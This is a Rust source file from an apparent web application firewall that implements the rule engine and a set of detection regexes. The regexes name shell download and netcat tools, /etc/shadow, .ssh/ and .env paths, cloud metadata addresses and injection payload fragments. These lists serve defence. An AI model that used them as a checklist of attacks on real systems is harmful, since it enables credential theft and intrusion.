synapse_pingora/waf/
engine.rs

1//! Core WAF rule engine implementation.
2
3use parking_lot::RwLock;
4use std::collections::HashMap;
5use std::sync::Arc;
6use std::time::{Duration, Instant};
7
8use base64::engine::general_purpose::STANDARD as BASE64_STANDARD;
9use base64::Engine as _;
10use once_cell::sync::Lazy;
11use percent_encoding::percent_decode_str;
12use regex::{Regex, RegexBuilder};
13
/// Evaluation budget used when the caller does not pick one (see `analyze_safe`).
///
/// 50ms is enough for ordinary requests while still cutting off pathological ones.
pub const DEFAULT_EVAL_TIMEOUT: Duration = Duration::from_millis(50);

/// Hard ceiling for caller-supplied timeouts.
///
/// `analyze_with_timeout` clamps its argument to this value so a caller cannot
/// effectively disable the deadline by passing a huge duration.
pub const MAX_EVAL_TIMEOUT: Duration = Duration::from_millis(500);

/// Size limit handed to `RegexBuilder::size_limit` for rule-supplied patterns (10 MiB).
///
/// Patterns whose compiled form would exceed this are rejected at load time.
const REGEX_SIZE_LIMIT: usize = 10 * 1024 * 1024;

/// Limit handed to `RegexBuilder::dfa_size_limit` for rule-supplied patterns (10 MiB).
const REGEX_DFA_SIZE_LIMIT: usize = 10 * 1024 * 1024;

/// Nesting depth at which `eval_condition` stops recursing and reports "no match".
const MAX_RECURSION_DEPTH: u32 = 10;
31
32use crate::waf::index::{
33    build_rule_index, get_candidate_rule_indices, method_to_mask, CandidateCache,
34    CandidateCacheKey, RuleIndex, REQ_ARGS, REQ_ARG_ENTRIES, REQ_BODY, REQ_JSON,
35};
36use crate::waf::rule::{MatchCondition, MatchValue, WafRule};
37use crate::waf::state::StateStore;
38use crate::waf::types::{Action, EvalContext, Request, RiskContribution, Verdict};
39use crate::waf::WafError;
40use crate::waf::{TraceEvent, TraceSink, TraceState};
41
42// Pre-compiled regex patterns for SQL/XSS detection
43#[allow(dead_code)]
44static BASE64_PATTERN: Lazy<Regex> =
45    Lazy::new(|| Regex::new(r"^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{2,3}=)?$").expect("base64 regex"));
46
47static SQL_KEYWORDS: Lazy<Regex> = Lazy::new(|| {
48    RegexBuilder::new(r"\b(load_file|into outfile)\b")
49        .case_insensitive(true)
50        .build()
51        .expect("sql keywords regex")
52});
53
54static SQL_PHRASES: Lazy<Regex> = Lazy::new(|| {
55    RegexBuilder::new(
56        r"\b(insert\s+into|delete\s+from|drop\s+(table|database|view)|union\s+(all\s+)?select|select\s+\*\s+from|select\s+.*\s+from\s+information_schema)\b",
57    )
58    .case_insensitive(true)
59    .build()
60    .expect("sql phrases regex")
61});
62
63static SQL_OR_AND_EQ: Lazy<Regex> = Lazy::new(|| {
64    RegexBuilder::new(r"(\bor\b|\band\b)\s+\d+=\d+")
65        .case_insensitive(true)
66        .build()
67        .expect("sql or/and regex")
68});
69
70static SQL_COMMENT_1: Lazy<Regex> = Lazy::new(|| Regex::new(r"'\s*--").expect("sql comment 1"));
71static SQL_COMMENT_2: Lazy<Regex> = Lazy::new(|| Regex::new(r#""\s*--"#).expect("sql comment 2"));
72static SQL_SHUTDOWN: Lazy<Regex> = Lazy::new(|| {
73    RegexBuilder::new(r";\s*shutdown\b")
74        .case_insensitive(true)
75        .build()
76        .expect("sql shutdown")
77});
78
79static XSS_SCRIPT: Lazy<Regex> = Lazy::new(|| {
80    RegexBuilder::new(r"<\s*script\b")
81        .case_insensitive(true)
82        .build()
83        .expect("xss script")
84});
85static XSS_JS_SCHEME: Lazy<Regex> = Lazy::new(|| {
86    RegexBuilder::new(r"javascript:")
87        .case_insensitive(true)
88        .build()
89        .expect("xss js scheme")
90});
91static XSS_ON_ATTR: Lazy<Regex> = Lazy::new(|| {
92    RegexBuilder::new(
93        r"\b(onload|onclick|onerror|onmouseover|onfocus|onblur|onsubmit|onchange|oninput|onkeydown|onkeyup|onkeypress|onmousedown|onmouseup|onmousemove|onmouseout|onresize|onscroll|onunload)\s*=",
94    )
95    .case_insensitive(true)
96    .build()
97    .expect("xss on attr")
98});
99static XSS_COOKIE: Lazy<Regex> = Lazy::new(|| {
100    RegexBuilder::new(r"document\.cookie")
101        .case_insensitive(true)
102        .build()
103        .expect("xss cookie")
104});
105static XSS_IMG_SRC: Lazy<Regex> = Lazy::new(|| {
106    RegexBuilder::new(r"<\s*img[^>]+src")
107        .case_insensitive(true)
108        .build()
109        .expect("xss img src")
110});
111
112// Command injection detection patterns
113// SECURITY: These patterns detect OS command injection attempts
114
115/// Backtick command execution: `cmd`
116static CMD_BACKTICK: Lazy<Regex> =
117    Lazy::new(|| Regex::new(r"`[^`]+`").expect("cmd backtick regex"));
118
119/// $() command substitution: $(cmd)
120static CMD_SUBSHELL: Lazy<Regex> =
121    Lazy::new(|| Regex::new(r"\$\([^)]+\)").expect("cmd subshell regex"));
122
123/// Variable substitution patterns: ${IFS}, ${PATH}, ${variable}
124static CMD_VAR_SUBST: Lazy<Regex> =
125    Lazy::new(|| Regex::new(r"\$\{[^}]+\}").expect("cmd var subst regex"));
126
127/// IFS manipulation (common bypass technique)
128static CMD_IFS: Lazy<Regex> = Lazy::new(|| {
129    RegexBuilder::new(r"\$IFS|\$\{IFS\}|\bIFS\s*=")
130        .case_insensitive(true)
131        .build()
132        .expect("cmd IFS regex")
133});
134
135/// Shell metacharacters for command chaining: ; | && ||
136static CMD_CHAIN: Lazy<Regex> = Lazy::new(|| Regex::new(r"[;&|]{1,2}").expect("cmd chain regex"));
137
138/// Brace expansion: {cmd1,cmd2}
139static CMD_BRACE: Lazy<Regex> =
140    Lazy::new(|| Regex::new(r"\{[^}]*,[^}]*\}").expect("cmd brace regex"));
141
142/// Common dangerous commands (with word boundaries to avoid false positives)
143static CMD_DANGEROUS: Lazy<Regex> = Lazy::new(|| {
144    RegexBuilder::new(
145        r"\b(cat\s+/etc/|/etc/passwd|/etc/shadow|wget\s|curl\s|nc\s+-|ncat\s|netcat\s|bash\s+-|sh\s+-c|/bin/sh|/bin/bash|chmod\s+\+|chown\s|rm\s+-rf|mkfifo|mknod|python\s+-c|perl\s+-e|ruby\s+-e|php\s+-r|lua\s+-e|awk\s+|xargs\s)"
146    )
147    .case_insensitive(true)
148    .build()
149    .expect("cmd dangerous regex")
150});
151
152/// Encoded newline patterns (%0a, %0d, %0A, %0D)
153static CMD_NEWLINE_ENCODED: Lazy<Regex> = Lazy::new(|| {
154    RegexBuilder::new(r"%0[aAdD]")
155        .case_insensitive(true)
156        .build()
157        .expect("cmd newline encoded regex")
158});
159
160/// Literal newline/carriage return in parameter values
161static CMD_NEWLINE_LITERAL: Lazy<Regex> =
162    Lazy::new(|| Regex::new(r"[\r\n]").expect("cmd newline literal regex"));
163
164/// Redirection operators: > >> < 2>&1
165static CMD_REDIRECT: Lazy<Regex> =
166    Lazy::new(|| Regex::new(r"[<>]{1,2}|2>&1|&>").expect("cmd redirect regex"));
167
168/// Path traversal combined with command execution
169static CMD_PATH_TRAVERSAL: Lazy<Regex> =
170    Lazy::new(|| Regex::new(r"\.{2,}/+").expect("cmd path traversal regex"));
171
172/// Null byte injection (can truncate strings in some contexts)
173static CMD_NULL_BYTE: Lazy<Regex> = Lazy::new(|| {
174    RegexBuilder::new(r"%00|\\x00|\\0")
175        .case_insensitive(true)
176        .build()
177        .expect("cmd null byte regex")
178});
179
180// Path traversal detection patterns
181// SECURITY: These patterns detect directory traversal attacks including encoding bypasses
182
183/// Basic path traversal: ../, ..\, ....//
184static PATH_TRAV_BASIC: Lazy<Regex> =
185    Lazy::new(|| Regex::new(r"\.{2,}[/\\]+|\.{2,}$").expect("path trav basic regex"));
186
187/// URL-encoded path traversal: %2e%2e%2f, %2e%2e/, ..%2f
188static PATH_TRAV_ENCODED: Lazy<Regex> = Lazy::new(|| {
189    RegexBuilder::new(r"%2e%2e[%/\\]|\.\.%2f|\.\.%5c|%2e%2e$")
190        .case_insensitive(true)
191        .build()
192        .expect("path trav encoded regex")
193});
194
195/// Double URL-encoded path traversal: %252e%252e%252f
196static PATH_TRAV_DOUBLE: Lazy<Regex> = Lazy::new(|| {
197    RegexBuilder::new(r"%25(?:2e|2E){2}%25(?:2f|2F|5c|5C)")
198        .case_insensitive(true)
199        .build()
200        .expect("path trav double encoded regex")
201});
202
203/// Unicode/overlong UTF-8 encoded path traversal
204/// %c0%ae = overlong encoding of '.'
205/// %c0%af = overlong encoding of '/'
206/// %c1%9c = overlong encoding of '\'
207static PATH_TRAV_UNICODE: Lazy<Regex> = Lazy::new(|| {
208    RegexBuilder::new(r"%c0%ae|%c0%af|%c1%9c|%c0%9v|%c1%1c|%c0%2e|%e0%80%ae|%f0%80%80%ae")
209        .case_insensitive(true)
210        .build()
211        .expect("path trav unicode regex")
212});
213
214/// Backslash variants for Windows paths
215static PATH_TRAV_BACKSLASH: Lazy<Regex> = Lazy::new(|| {
216    RegexBuilder::new(r"\.\.\\|%5c%2e%2e|%2e%2e%5c")
217        .case_insensitive(true)
218        .build()
219        .expect("path trav backslash regex")
220});
221
222/// Sensitive path targets (Unix)
223static PATH_TRAV_TARGETS_UNIX: Lazy<Regex> = Lazy::new(|| {
224    Regex::new(r"/etc/(passwd|shadow|group|hosts|sudoers|ssh/|crontab)|/proc/|/dev/|/var/log/|/root/|\.ssh/|\.bash_history|\.env")
225        .expect("path trav targets unix regex")
226});
227
228/// Sensitive path targets (Windows)
229static PATH_TRAV_TARGETS_WIN: Lazy<Regex> = Lazy::new(|| {
230    RegexBuilder::new(
231        r"boot\.ini|win\.ini|system32|windows\\system|SAM|NTDS\.dit|web\.config|machine\.config",
232    )
233    .case_insensitive(true)
234    .build()
235    .expect("path trav targets win regex")
236});
237
238/// Null byte injection for path truncation: file.php%00.jpg
239static PATH_TRAV_NULL: Lazy<Regex> = Lazy::new(|| {
240    RegexBuilder::new(r"%00|\\x00|\\0|\x00")
241        .case_insensitive(true)
242        .build()
243        .expect("path trav null regex")
244});
245
246// SSRF (Server-Side Request Forgery) detection patterns
247// SECURITY: These patterns detect SSRF attempts targeting internal services and cloud metadata
248
249/// IPv4 localhost patterns: 127.0.0.1, 127.0.0.0/8
250static SSRF_LOCALHOST_V4: Lazy<Regex> = Lazy::new(|| {
251    Regex::new(r"(?i)(?://|@)127\.(?:\d{1,3}\.){2}\d{1,3}(?:[:/]|$)")
252        .expect("ssrf localhost v4 regex")
253});
254
255/// IPv6 localhost patterns: ::1, [::1], 0:0:0:0:0:0:0:1
256static SSRF_LOCALHOST_V6: Lazy<Regex> = Lazy::new(|| {
257    Regex::new(r"(?i)(?://|@)\[?(?:::1|0:0:0:0:0:0:0:1)\]?(?:[:/]|$)")
258        .expect("ssrf localhost v6 regex")
259});
260
261/// IPv6-mapped IPv4 bypass attempts: ::ffff:127.0.0.1, ::ffff:169.254.169.254
262static SSRF_MAPPED_IPV6: Lazy<Regex> = Lazy::new(|| {
263    Regex::new(r"(?i)(?://|@)\[?::ffff:(?:\d{1,3}\.){3}\d{1,3}\]?(?:[:/]|$)")
264        .expect("ssrf mapped ipv6 regex")
265});
266
267/// Cloud metadata endpoints: 169.254.169.254, 169.254.170.2 (AWS ECS)
268static SSRF_CLOUD_METADATA: Lazy<Regex> = Lazy::new(|| {
269    Regex::new(r"(?i)(?://|@)169\.254\.(?:169\.254|170\.2)(?:[:/]|$)")
270        .expect("ssrf cloud metadata regex")
271});
272
273/// AWS/GCP/Azure metadata hostnames
274static SSRF_METADATA_HOST: Lazy<Regex> = Lazy::new(|| {
275    RegexBuilder::new(r"(?://|@)(?:metadata\.google\.internal|metadata\.azure\.com|instance-data\.ec2\.internal|169\.254\.169\.254)")
276        .case_insensitive(true)
277        .build()
278        .expect("ssrf metadata host regex")
279});
280
281/// Private IPv4 ranges: 10.x.x.x, 192.168.x.x, 172.16-31.x.x
282static SSRF_PRIVATE_IP: Lazy<Regex> = Lazy::new(|| {
283    Regex::new(r"(?i)(?://|@)(?:10\.(?:\d{1,3}\.){2}\d{1,3}|192\.168\.(?:\d{1,3}\.)\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.(?:\d{1,3}\.)\d{1,3})(?:[:/]|$)")
284        .expect("ssrf private ip regex")
285});
286
287/// Link-local addresses: 169.254.0.0/16 (excluding cloud metadata which is handled separately)
288static SSRF_LINK_LOCAL: Lazy<Regex> = Lazy::new(|| {
289    Regex::new(r"(?i)(?://|@)169\.254\.(?:\d{1,3}\.)\d{1,3}(?:[:/]|$)")
290        .expect("ssrf link local regex")
291});
292
293/// Dangerous URL schemes that can be used for SSRF
294/// file://, gopher://, dict://, ldap://, expect://, php://, data:, jar://
295/// Note: data: URIs don't use // so we match data: separately
296static SSRF_DANGEROUS_SCHEME: Lazy<Regex> = Lazy::new(|| {
297    RegexBuilder::new(r"(?:^|[^a-z0-9])(?:(?:file|gopher|dict|ldap|ldaps|expect|php|phar|jar|ftp|tftp|ssh2)://|data:)")
298        .case_insensitive(true)
299        .build()
300        .expect("ssrf dangerous scheme regex")
301});
302
303/// Decimal/octal/hex IP encoding bypasses: 2130706433, 0x7f000001, 017700000001
304static SSRF_ENCODED_IP: Lazy<Regex> = Lazy::new(|| {
305    // Decimal localhost: 2130706433 = 127.0.0.1
306    // Hex localhost: 0x7f000001 = 127.0.0.1
307    // Octal localhost: 017700000001 (varies by system)
308    Regex::new(r"(?i)(?://|@)(?:0x[0-9a-f]{8}|2130706433|017700000001|\d{8,10})(?:[:/]|$)")
309        .expect("ssrf encoded ip regex")
310});
311
312// NoSQL Injection detection patterns
313// SECURITY: These patterns detect MongoDB, CouchDB, and other NoSQL injection attacks
314
315/// MongoDB operator injection: $where, $ne, $gt, $lt, $gte, $lte, $in, $nin, $regex, etc.
316static NOSQL_MONGO_OPERATORS: Lazy<Regex> = Lazy::new(|| {
317    // Match MongoDB operators in JSON context with various quote styles
318    Regex::new(r#"(?i)["\']?\$(?:where|ne|gt|lt|gte|lte|in|nin|regex|exists|type|mod|all|size|elemMatch|meta|slice|comment|rand|natural|or|and|not|nor|expr|jsonSchema|text|geoWithin|geoIntersects|near|nearSphere)["\']?\s*:"#)
319        .expect("nosql mongo operators regex")
320});
321
322/// MongoDB $where JavaScript execution (HIGH RISK)
323static NOSQL_WHERE_JS: Lazy<Regex> = Lazy::new(|| {
324    // Match $where with function or JavaScript code
325    Regex::new(r#"(?i)["\']?\$where["\']?\s*:\s*["\']?(?:function\s*\(|this\.|sleep\(|db\.|new\s+Date|tojson|printjson)"#)
326        .expect("nosql where js regex")
327});
328
329/// MongoDB authentication bypass: {"password": {"$ne": null}}
330static NOSQL_AUTH_BYPASS: Lazy<Regex> = Lazy::new(|| {
331    Regex::new(r#"(?i)(?:password|passwd|pwd|user|username|login|email)["\']?\s*:\s*\{\s*["\']?\$(?:ne|gt|lt|gte|lte|exists)["\']?\s*:"#)
332        .expect("nosql auth bypass regex")
333});
334
335/// MongoDB aggregation pipeline injection
336static NOSQL_AGGREGATION: Lazy<Regex> = Lazy::new(|| {
337    Regex::new(r#"(?i)["\']?\$(?:lookup|unwind|group|project|match|sort|limit|skip|out|merge|addFields|replaceRoot)["\']?\s*:"#)
338        .expect("nosql aggregation regex")
339});
340
341/// CouchDB injection patterns: _all_docs, _view, _design
342static NOSQL_COUCHDB: Lazy<Regex> = Lazy::new(|| {
343    Regex::new(r"(?i)(?:_all_docs|_design/|_view/|_changes|_bulk_docs|_find)")
344        .expect("nosql couchdb regex")
345});
346
347/// Redis command injection patterns
348static NOSQL_REDIS: Lazy<Regex> = Lazy::new(|| {
349    RegexBuilder::new(r"\b(?:EVAL|EVALSHA|SCRIPT|DEBUG|FLUSHALL|FLUSHDB|CONFIG|SHUTDOWN|SLAVEOF|REPLICAOF|MIGRATE|DUMP|RESTORE|KEYS|SCAN)\b")
350        .case_insensitive(true)
351        .build()
352        .expect("nosql redis regex")
353});
354
355/// Cassandra CQL injection patterns
356static NOSQL_CASSANDRA: Lazy<Regex> = Lazy::new(|| {
357    RegexBuilder::new(
358        r"\b(?:ALLOW\s+FILTERING|USING\s+TTL|USING\s+TIMESTAMP|TOKEN\s*\(|WRITETIME\s*\()\b",
359    )
360    .case_insensitive(true)
361    .build()
362    .expect("nosql cassandra regex")
363});
364
365/// JSON injection patterns (prototype pollution, __proto__)
366static JSON_PROTO_POLLUTION: Lazy<Regex> = Lazy::new(|| {
367    Regex::new(r#"(?i)["\']?(?:__proto__|constructor|prototype)["\']?\s*:"#)
368        .expect("json proto pollution regex")
369});
370
/// Compiled rules and indices for fast swapping (labs-tui optimization).
///
/// Built by `Engine::precompute_rules` and installed into an engine by
/// `Engine::reload_from_compiled`, so the expensive parsing and regex
/// compilation can happen before the engine is touched.
pub struct CompiledRules {
    /// Parsed rules, in the order they appeared in the input.
    pub rules: Vec<WafRule>,
    /// Maps a rule's `id` to its position in `rules`.
    pub rule_id_to_index: HashMap<u32, usize>,
    /// Index produced by `build_rule_index` over `rules`.
    pub rule_index: RuleIndex,
    /// Compiled regexes, keyed by the pattern source collected from the rules.
    pub regex_cache: HashMap<String, Regex>,
    /// Compiled case-insensitive, word-bounded regexes, keyed by the raw word.
    pub word_regex_cache: HashMap<String, Regex>,
}
379
/// Main WAF rule engine.
///
/// Rule data (`rules`, the indices and the regex caches) is replaced through
/// `&mut self` methods; the remaining fields sit behind locks so they can be
/// updated through a shared reference.
pub struct Engine {
    /// Loaded rules; candidate indices are positions into this vector.
    rules: Vec<WafRule>,
    /// Maps a rule's `id` to its position in `rules`.
    rule_id_to_index: HashMap<u32, usize>,
    /// Index produced by `build_rule_index`, used to select candidate rules.
    rule_index: RuleIndex,
    /// Compiled regexes keyed by pattern source.
    regex_cache: HashMap<String, Regex>,
    /// Compiled word-boundary regexes keyed by the raw word.
    word_regex_cache: HashMap<String, Regex>,
    /// State store. NOTE(review): not read in the visible part of this file;
    /// its role should be confirmed against the rest of the engine.
    store: RwLock<StateStore>,
    /// Cache of candidate rule lists; cleared whenever the rule set is replaced.
    candidate_cache: RwLock<CandidateCache>,
    /// Maximum risk score (100.0 default, 1000.0 for extended range).
    max_risk: RwLock<f64>,
    /// Whether to apply repeat offender multipliers.
    enable_repeat_multipliers: RwLock<bool>,
}
394
395impl Engine {
396    /// Create an empty engine with no rules.
397    pub fn empty() -> Self {
398        Self {
399            rules: Vec::new(),
400            rule_id_to_index: HashMap::new(),
401            rule_index: RuleIndex::default(),
402            regex_cache: HashMap::new(),
403            word_regex_cache: HashMap::new(),
404            store: RwLock::new(StateStore::default()),
405            candidate_cache: RwLock::new(CandidateCache::new(2048)),
406            max_risk: RwLock::new(100.0),
407            enable_repeat_multipliers: RwLock::new(true),
408        }
409    }
410
411    /// Set maximum risk score (100.0 default, 1000.0 for extended range).
412    pub fn set_max_risk(&self, max_risk: f64) {
413        *self.max_risk.write() = max_risk;
414    }
415
416    /// Get maximum risk score.
417    pub fn max_risk(&self) -> f64 {
418        *self.max_risk.read()
419    }
420
421    /// Enable or disable repeat offender multipliers.
422    pub fn set_repeat_multipliers(&self, enabled: bool) {
423        *self.enable_repeat_multipliers.write() = enabled;
424    }
425
426    /// Load rules from JSON bytes.
427    pub fn load_rules(&mut self, json: &[u8]) -> Result<usize, WafError> {
428        let compiled = self.precompute_rules(json)?;
429        let count = compiled.rules.len();
430        self.reload_from_compiled(compiled);
431        Ok(count)
432    }
433
434    /// Precompute all rule structures including regex compilation.
435    ///
436    /// This is an expensive operation that should happen outside of global locks.
437    pub fn precompute_rules(&self, json: &[u8]) -> Result<CompiledRules, WafError> {
438        let rules: Vec<WafRule> =
439            serde_json::from_slice(json).map_err(|e| WafError::ParseError(e.to_string()))?;
440
441        let rule_id_to_index = rules
442            .iter()
443            .enumerate()
444            .map(|(idx, rule)| (rule.id, idx))
445            .collect();
446
447        let rule_index = build_rule_index(&rules);
448
449        let mut regex_cache = HashMap::new();
450        let mut word_regex_cache = HashMap::new();
451
452        // Pre-compile regex patterns
453        let mut patterns = Vec::<String>::new();
454        let mut words = Vec::<String>::new();
455        for rule in &rules {
456            for cond in &rule.matches {
457                collect_regex_patterns(cond, &mut patterns);
458                collect_word_values(cond, &mut words);
459            }
460        }
461
462        patterns.sort();
463        patterns.dedup();
464        for pattern in patterns {
465            let compiled = RegexBuilder::new(&pattern)
466                .multi_line(true)
467                .size_limit(REGEX_SIZE_LIMIT)
468                .dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
469                .build()
470                .map_err(|e| WafError::RegexError(format!("'{pattern}': {e}")))?;
471            regex_cache.insert(pattern, compiled);
472        }
473
474        words.sort();
475        words.dedup();
476        for word in words {
477            let pattern = format!(r"(?i)\b{}\b", regex::escape(&word));
478            let compiled = RegexBuilder::new(&pattern)
479                .multi_line(true)
480                .size_limit(REGEX_SIZE_LIMIT)
481                .dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
482                .build()
483                .map_err(|e| WafError::RegexError(format!("word '{word}': {e}")))?;
484            word_regex_cache.insert(word, compiled);
485        }
486
487        Ok(CompiledRules {
488            rules,
489            rule_id_to_index,
490            rule_index,
491            regex_cache,
492            word_regex_cache,
493        })
494    }
495
496    /// Fast swap of rule state using precomputed data.
497    pub fn reload_from_compiled(&mut self, compiled: CompiledRules) {
498        self.rules = compiled.rules;
499        self.rule_id_to_index = compiled.rule_id_to_index;
500        self.rule_index = compiled.rule_index;
501        self.regex_cache = compiled.regex_cache;
502        self.word_regex_cache = compiled.word_regex_cache;
503        self.candidate_cache.write().clear();
504    }
505
506    /// Parse rules from JSON bytes without modifying engine state.
507    pub fn parse_rules(json: &[u8]) -> Result<Vec<WafRule>, WafError> {
508        serde_json::from_slice(json).map_err(|e| WafError::ParseError(e.to_string()))
509    }
510
511    /// Reload the engine with a new set of rules.
512    pub fn reload_rules(&mut self, rules: Vec<WafRule>) -> Result<(), WafError> {
513        self.rules = rules;
514        self.rule_id_to_index = self
515            .rules
516            .iter()
517            .enumerate()
518            .map(|(idx, rule)| (rule.id, idx))
519            .collect();
520        self.rule_index = build_rule_index(&self.rules);
521        self.candidate_cache.write().clear();
522        self.regex_cache.clear();
523        self.word_regex_cache.clear();
524
525        // Pre-compile regex patterns
526        let mut patterns = Vec::<String>::new();
527        let mut words = Vec::<String>::new();
528        for rule in &self.rules {
529            for cond in &rule.matches {
530                collect_regex_patterns(cond, &mut patterns);
531                collect_word_values(cond, &mut words);
532            }
533        }
534
535        patterns.sort();
536        patterns.dedup();
537        for pattern in patterns {
538            let compiled = RegexBuilder::new(&pattern)
539                .multi_line(true)
540                .size_limit(REGEX_SIZE_LIMIT)
541                .dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
542                .build()
543                .map_err(|e| WafError::RegexError(format!("'{pattern}': {e}")))?;
544            self.regex_cache.insert(pattern, compiled);
545        }
546
547        words.sort();
548        words.dedup();
549        for word in words {
550            let pattern = format!(r"(?i)\b{}\b", regex::escape(&word));
551            let compiled = RegexBuilder::new(&pattern)
552                .multi_line(true)
553                .size_limit(REGEX_SIZE_LIMIT)
554                .dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
555                .build()
556                .map_err(|e| WafError::RegexError(format!("word '{word}': {e}")))?;
557            self.word_regex_cache.insert(word, compiled);
558        }
559
560        Ok(())
561    }
562
563    /// Get the number of loaded rules.
564    pub fn rule_count(&self) -> usize {
565        self.rules.len()
566    }
567
568    /// Analyze a request and return a verdict.
569    pub fn analyze(&self, req: &Request) -> Verdict {
570        let ctx = EvalContext::from_request(req);
571        let mut trace_state = TraceState::disabled();
572        self.evaluate_with_trace(&ctx, &mut trace_state)
573    }
574
575    /// Analyze a request and emit evaluation trace events.
576    pub fn analyze_with_trace(&self, req: &Request, trace: &mut dyn TraceSink) -> Verdict {
577        let ctx = EvalContext::from_request(req);
578        let mut trace_state = TraceState::enabled(trace);
579        let start = Instant::now();
580        let verdict = self.evaluate_with_trace(&ctx, &mut trace_state);
581        let detection_time_us = start.elapsed().as_micros() as u64;
582
583        if trace_state.is_enabled() {
584            trace_state.emit(TraceEvent::EvaluationFinished {
585                verdict: if matches!(verdict.action, Action::Block) {
586                    "block".to_string()
587                } else {
588                    "allow".to_string()
589                },
590                risk_score: verdict.risk_score,
591                matched_rules: verdict.matched_rules.clone(),
592                timed_out: verdict.timed_out,
593                rules_evaluated: verdict.rules_evaluated,
594                detection_time_us,
595            });
596        }
597
598        verdict
599    }
600
601    /// Analyze a request with a timeout to prevent DoS via complex regexes.
602    ///
603    /// # Arguments
604    /// * `req` - The request to analyze
605    /// * `timeout` - Maximum time allowed for rule evaluation (capped at MAX_EVAL_TIMEOUT)
606    ///
607    /// # Returns
608    /// A `Verdict` with `timed_out=true` if evaluation exceeded the deadline.
609    /// Partial results (rules evaluated before timeout) are still included.
610    pub fn analyze_with_timeout(&self, req: &Request, timeout: Duration) -> Verdict {
611        let effective_timeout = timeout.min(MAX_EVAL_TIMEOUT);
612        let deadline = Instant::now() + effective_timeout;
613        let ctx = EvalContext::from_request_with_deadline(req, deadline);
614        let mut trace_state = TraceState::disabled();
615        self.evaluate_with_trace(&ctx, &mut trace_state)
616    }
617
618    /// Analyze a request with the default timeout (DEFAULT_EVAL_TIMEOUT).
619    pub fn analyze_safe(&self, req: &Request) -> Verdict {
620        self.analyze_with_timeout(req, DEFAULT_EVAL_TIMEOUT)
621    }
622
623    fn evaluate_with_trace(&self, ctx: &EvalContext, trace: &mut TraceState) -> Verdict {
624        let mut matched_rules = Vec::new();
625        let mut total_risk = 0.0;
626        let mut should_block = false;
627        let mut timed_out = false;
628        let mut rules_evaluated: u32 = 0;
629        let risk_contributions: Vec<RiskContribution> = Vec::new();
630
631        // Get risk config
632        let max_risk = *self.max_risk.read();
633        let _enable_multipliers = *self.enable_repeat_multipliers.read();
634
635        // Get candidate rules using index
636        let method_bit = method_to_mask(ctx.method).unwrap_or(0);
637        let uri = ctx.url;
638        let available_features = compute_available_features(ctx);
639        let header_mask = compute_request_header_mask(&self.rule_index, &ctx.headers);
640        let cache_key = CandidateCacheKey {
641            method_bit,
642            available_features,
643            is_static: ctx.is_static,
644            header_mask,
645        };
646
647        // Try reading from cache first (requires write lock due to LRU tracking)
648        let cached = self.candidate_cache.write().get(&cache_key, uri);
649        let candidates: Arc<[usize]> = match cached {
650            Some(v) => v,
651            None => {
652                // Compute and write to cache
653                let computed = get_candidate_rule_indices(
654                    &self.rule_index,
655                    method_bit,
656                    uri,
657                    available_features,
658                    ctx.is_static,
659                    header_mask,
660                    self.rules.len(),
661                    safe_percent_decode,
662                );
663                let candidates: Arc<[usize]> = Arc::from(computed);
664                self.candidate_cache
665                    .write()
666                    .insert(cache_key, uri.to_string(), candidates.clone());
667                candidates
668            }
669        };
670
671        if trace.is_enabled() {
672            trace.emit(TraceEvent::EvaluationStarted {
673                method: ctx.method.to_string(),
674                uri: ctx.url.to_string(),
675                candidate_rules: candidates.len(),
676            });
677        }
678
679        // Evaluate each candidate rule with timeout checking
680        for &rule_idx in candidates.iter() {
681            // Check deadline before each rule evaluation
682            if ctx.is_deadline_exceeded() {
683                timed_out = true;
684                break;
685            }
686
687            let rule = &self.rules[rule_idx];
688            rules_evaluated += 1;
689
690            if trace.is_enabled() {
691                trace.emit(TraceEvent::RuleStart { rule_id: rule.id });
692            }
693
694            let matched = self.eval_rule(rule, ctx, trace);
695
696            if trace.is_enabled() {
697                trace.emit(TraceEvent::RuleEnd {
698                    rule_id: rule.id,
699                    matched,
700                    risk: rule.effective_risk(),
701                    blocking: rule.blocking.unwrap_or(false),
702                });
703            }
704
705            if matched {
706                matched_rules.push(rule.id);
707                total_risk += rule.effective_risk();
708                if rule.blocking.unwrap_or(false) {
709                    should_block = true;
710                }
711            }
712        }
713
714        // Compute risk score (clamped to max_risk)
715        let risk_score = total_risk.min(max_risk).max(0.0) as u16;
716
717        Verdict {
718            action: if should_block {
719                Action::Block
720            } else {
721                Action::Allow
722            },
723            risk_score,
724            matched_rules,
725            entity_risk: 0.0,
726            entity_blocked: false,
727            block_reason: if should_block {
728                Some("Rule-based block".to_string())
729            } else if timed_out {
730                Some("Evaluation timeout (partial result)".to_string())
731            } else {
732                None
733            },
734            risk_contributions,
735            endpoint_template: None,
736            endpoint_risk: None,
737            anomaly_score: None,
738            adjusted_threshold: None,
739            anomaly_signals: Vec::new(),
740            timed_out,
741            rules_evaluated: if timed_out {
742                Some(rules_evaluated)
743            } else {
744                None
745            },
746        }
747    }
748
749    fn eval_rule(&self, rule: &WafRule, ctx: &EvalContext, trace: &mut TraceState) -> bool {
750        for cond in &rule.matches {
751            if !self.eval_condition(cond, ctx, None, trace, rule.id, 0) {
752                return false;
753            }
754        }
755        true
756    }
757
758    fn eval_condition(
759        &self,
760        condition: &MatchCondition,
761        ctx: &EvalContext,
762        value: Option<&str>,
763        trace: &mut TraceState,
764        rule_id: u32,
765        depth: u32,
766    ) -> bool {
767        if depth >= MAX_RECURSION_DEPTH {
768            return false;
769        }
770
771        let matched = match condition.kind.as_str() {
772            "boolean" => self.eval_boolean(condition, ctx, value, trace, rule_id, depth),
773            "method" => self.eval_method(condition, ctx, trace, rule_id, depth),
774            "uri" => self.eval_uri(condition, ctx, trace, rule_id, depth),
775            "args" => self.eval_args(condition, ctx, trace, rule_id, depth),
776            "named_argument" => self.eval_named_argument(condition, ctx, trace, rule_id, depth),
777            "header" => self.eval_header(condition, ctx, trace, rule_id, depth),
778            "contains" => eval_contains(condition.match_value.as_ref(), value),
779            "starts_with" => eval_starts_with(condition.match_value.as_ref(), value),
780            "equals" => eval_equals(condition.match_value.as_ref(), value),
781            "regex" => self.eval_regex(condition.match_value.as_ref(), value),
782            "word" => self.eval_word(condition.match_value.as_ref(), value),
783            "multiple_contains" => eval_multiple_contains(condition.match_value.as_ref(), value),
784            "to_lowercase" => match value {
785                Some(v) => {
786                    let lowered = v.to_lowercase();
787                    condition
788                        .match_value
789                        .as_ref()
